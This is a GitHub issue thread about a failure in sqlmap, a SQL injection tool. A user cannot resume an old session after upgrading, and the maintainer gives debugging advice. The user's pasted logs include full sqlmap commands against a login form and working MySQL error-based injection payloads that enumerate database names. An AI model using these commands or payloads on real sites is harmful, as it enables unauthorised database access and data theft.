Old session not working

[jofray]

Describe the bug
I tried running sqlmap 1.2.25#stable (installed with brew) on vulnerable website and got valid injection point, fetching row from table was taking time so I decided to update sqlmap using brew upgrade sqlmap (running 1.3.7#stable now). I tried running sqlmap on same website but the detection phase starts from scratch instead of resuming from session.sqlite file. I tried supplying session file with -s argument but that didn't work as well. This could be issue with a using different version? I couldn't find 1.2.25 so installed 1.2.3, it runs fine(?) with the session file. The injection is resumed but sqlmap is never able to fetch any data. Even running with --hex or --no-cast didn't help.

Expected behavior
Perform injection successfully based on previous session?

Running environment:

• sqlmap version 1.2.3#stable
• git
• Ubuntu 14.04.6 LTS
• Python 2.7.6

Additional context

root@ubuntu~/sqlmap-1.2.3# ./sqlmap.py -r login-request --risk 3 --level 3 -s old-session.sqlite --dbs --fresh-queries
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.2.3#stable}
|_ -| . [)]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 01:24:56

[01:24:56] [INFO] parsing HTTP request from 'login-request'
[01:24:56] [INFO] resuming back-end DBMS 'mysql' 
[01:24:56] [INFO] testing connection to the target URL
sqlmap got a 302 redirect to 'https://www.example.com/demo/'. Do you want to follow? [Y/n] n
[01:24:59] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: frm_username (POST)
    Type: error-based
    Title: MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: frm_username=admin' AND ROW(8925,8813)>(SELECT COUNT(*),CONCAT(0x7171767671,(SELECT (ELT(8925=8925,1))),0x71786b6a71,FLOOR(RAND(0)*2))x FROM (SELECT 8142 UNION SELECT 5056 UNION SELECT 7147 UNION SELECT 3751)a GROUP BY x)-- Bcwi&frm_password=abcd
---
[01:24:59] [INFO] the back-end DBMS is MySQL
web application technology: Apache, PHP 5.5.32
back-end DBMS: MySQL >= 4.1
[01:24:59] [INFO] fetching database names
[01:24:59] [WARNING] the SQL query provided does not return any output
[01:24:59] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[01:24:59] [INFO] falling back to current database
[01:24:59] [INFO] fetching current database
[01:25:00] [CRITICAL] unable to retrieve the database names

[*] shutting down at 01:25:00

[stamparm]

A) There have been major changes inside sqlmap in preparing for Python3. Hence, session had to be adjusted for both Python2 and Python3. Last irreversible change has been with 1.3.5.2
B) You have all tagged versions here. You can freely fetch a working version from there

[jofray]

Thank you for the prompt support. However I have another question using 1.2.3#stable I can use session file but I sqlmap doesn't appear to exploit the vulnerability. I ran sqlmap with -v3 and following is the output

root@ubuntu:~/sqlmap-1.2.3# ./sqlmap.py  -r login-request -s old-session.sqlite --dbs -v3 --fresh-queries
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.2.3#stable}
|_ -| . ["]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 10:52:52

[10:52:52] [INFO] parsing HTTP request from 'login-request'
[10:52:52] [DEBUG] not a valid WebScarab log data
[10:52:52] [DEBUG] cleaning up configuration parameters
[10:52:52] [DEBUG] setting the HTTP timeout
[10:52:52] [DEBUG] creating HTTP requests opener object
[10:52:52] [INFO] resuming back-end DBMS 'mysql' 
[10:52:52] [DEBUG] resolving hostname 'www.example.com'
[10:52:53] [INFO] testing connection to the target URL
sqlmap got a 302 redirect to 'https://www.example.com/demo/'. Do you want to follow? [Y/n] n
[10:52:55] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: frm_username (POST)
    Type: error-based
    Title: MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: frm_username=admin' AND ROW(8925,8813)>(SELECT COUNT(*),CONCAT(0x7171767671,(SELECT (ELT(8925=8925,1))),0x71786b6a71,FLOOR(RAND(0)*2))x FROM (SELECT 8142 UNION SELECT 5056 UNION SELECT 7147 UNION SELECT 3751)a GROUP BY x)-- Bcwi&frm_password=a&x=0&y=0
    Vector: AND ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)
---
[10:52:55] [INFO] the back-end DBMS is MySQL
web application technology: Apache, PHP 5.5.32
back-end DBMS: MySQL >= 4.1
[10:52:55] [INFO] fetching database names
[10:52:55] [PAYLOAD] admin' AND ROW(4777,5497)>(SELECT COUNT(*),CONCAT(0x7171767671,(SELECT IFNULL(CAST(COUNT(schema_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),0x71786b6a71,FLOOR(RAND(0)*2))x FROM (SELECT 3415 UNION SELECT 5474 UNION SELECT 2222 UNION SELECT 9271)a GROUP BY x)-- YEom
[10:52:55] [WARNING] the SQL query provided does not return any output
[10:52:55] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[10:52:55] [INFO] falling back to current database
[10:52:55] [INFO] fetching current database
[10:52:55] [PAYLOAD] admin' AND ROW(5050,1203)>(SELECT COUNT(*),CONCAT(0x7171767671,(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,54)),0x71786b6a71,FLOOR(RAND(0)*2))x FROM (SELECT 8150 UNION SELECT 5697 UNION SELECT 7914 UNION SELECT 8574)a GROUP BY x)-- EvSp
[10:52:55] [DEBUG] performed 1 queries in 0.17 seconds
[10:52:55] [CRITICAL] unable to retrieve the database names

[*] shutting down at 10:52:55

Performing the payloads in given by sqlmap, I can see the data but for some reason sqlmap always shuts down with

[10:52:55] [CRITICAL] unable to retrieve the database names

Is there are way this can be prevented?

[stamparm]

A) Sites tend to "patch" or "modify" stuff. You have an error-based SQLi, best one for debugging on YOUR side.
B) Please rerun everything with --fresh-queries --parse-errors -t /tmp/traffic.txt. Take a look into parsed error-messages and generated /tmp/traffic.txt. I have a feeling that something could pop out.
C) previous heuristics detected that the target is protected by some ... - please don't ask for further support as this is purely your issue
D) I would advise you to rerun everything with --flush-session after A) and B) and see if something comes out

Because of A) and C) I won't respond any more to this issue (as there was no issue in the first place)

[jofray]

Leaving this here so that anyone having similar issue can find it.
So cookie was creating the issue, removing cookie from request seemed to solve the problem.